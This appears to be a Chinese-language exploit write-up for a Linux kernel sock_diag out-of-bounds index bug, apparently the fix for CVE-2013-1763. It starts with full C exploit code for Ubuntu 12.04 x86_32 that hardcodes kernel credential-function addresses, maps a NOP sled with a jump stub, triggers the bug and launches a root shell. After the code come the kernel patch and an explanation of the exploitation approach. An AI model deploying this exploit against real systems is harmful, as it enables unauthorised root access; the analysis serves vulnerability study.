/* Ubuntu 12.04.02 x86_32 */ #include <unistd.h> #include <sys/socket.h> #include <linux/netlink.h> #include <netinet/tcp.h> #include <errno.h> #include <linux/if.h> #include <linux/filter.h> #include <string.h> #include <stdio.h> #include <stdlib.h> #include <linux/sock_diag.h> #include <linux/inet_diag.h> #include <linux/unix_diag.h> #include <sys/mman.h> typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); _commit_creds commit_creds; _prepare_kernel_cred prepare_kernel_cred; unsigned long sock_diag_handlers, nl_table; int __attribute__((regparm(3))) kernel_code() { commit_creds(prepare_kernel_cred(0)); return -1; } /* int jump_payload_not_used(void *skb, void *nlh) { asm volatile ( "mov $kernel_code, %eax\n" "call *%eax\n" ); } */ int main(int argc, char*argv[]) { int fd; unsigned family; struct { struct nlmsghdr nlh; //socket协议netlink数据包的格式 struct unix_diag_req r; } req; char buf[8192]; if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){ printf("Can't create sock diag socket\n"); return -1; } memset(&req, 0, sizeof(req)); req.nlh.nlmsg_len = sizeof(req); req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY; req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST; req.nlh.nlmsg_seq = 123456; req.r.udiag_states = -1; req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN; commit_creds = (_commit_creds) 0xc106d740; //commit_creds addr prepare_kernel_cred = (_prepare_kernel_cred) 0xc106d980; //prepare_kernel_cred addr req.r.sdiag_family = 51; unsigned long mmap_start, mmap_size; mmap_start = 0x10000; //映射1M内核空间 mmap_size = 0x120000; printf("mmapping at 0x%lx, size = 0x%lx\n", mmap_start, mmap_size); if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) { printf("mmap fault\n"); exit(1); } memset((void*)mmap_start, 0x90, mmap_size); char jump[] = "\x55\x89\xe5\xb8\x11\x11\x11\x11\xff\xd0\x5d\xc3"; //跳转到kernel_code() unsigned long *asd = &jump[4]; *asd = (unsigned long)kernel_code; //使用kernel_code函数的地址替换掉jump[]中的0x11 memcpy( (void*)mmap_start+mmap_size-sizeof(jump), jump, sizeof(jump)); //漏洞触发 if ( send(fd, &req, sizeof(req), 0) < 0) { printf("bad send\n"); close(fd); return -1; } printf("uid=%d, euid=%d\n",getuid(), geteuid() ); if(!getuid()) system("/bin/sh"); }
此漏洞是 Linux 内核中,由于内存访问越界导致的本地提权;
net/core/sock_diag.c View file @ 6e601a5 @@ -121,6 +121,9 @@ static int __sock_diag_rcv_msg(struct sk_buff *skb, struct nlmsghdr *nlh) if (nlmsg_len(nlh) < sizeof(*req)) return -EINVAL; + if (req->sdiag_family >= AF_MAX) + return -EINVAL; + hndl = sock_diag_lock_handler(req->sdiag_family); if (hndl == NULL) err = -ENOENT;
查看 Patch 代码,加入了对 sock_diag_lock_handler[] 数组上限判断;
static const inline struct sock_diag_handler *sock_diag_lock_handler(int family) { if (sock_diag_handlers[family] == NULL) request_module("net-pf-%d-proto-%d-type-%d", PF_NETLINK, NETLINK_SOCK_DIAG, family); mutex_lock(&sock_diag_table_mutex); return sock_diag_handlers[family]; /* 未判断family上界 */ }
漏洞利用的关键,是 sock_diag_handler 结构保存了一处 dump 的函数指针:
struct sock_diag_handler { __u8 family;// int (*dump)(struct sk_buff *skb, struct nlmsghdr *nlh); };
而在漏洞代码后面,有对 dump 的调用:
static int __sock_diag_rcv_msg(struct sk_buff *skb, struct nlmsghdr *nlh) { int err; struct sock_diag_req *req = NLMSG_DATA(nlh); struct sock_diag_handler *hndl; if (nlmsg_len(nlh) < sizeof(*req)) return -EINVAL; hndl = sock_diag_lock_handler(req->sdiag_family); /* 漏洞代码位置 */ if (hndl == NULL) err = -ENOENT; else err = hndl->dump(skb, nlh); /* 通过sock_diag_lock_handler指针,对dump的引用,此处是漏洞可利用的关键 */ sock_diag_unlock_handler(hndl); return err; }
因此我们的利用思路是,首先通过 req.r.sdiag_family 触发越界访问,并通过其值控制指针越界指向某内存地址 X,而 X 位置处4字节存放指向我们shellcode的内存地址;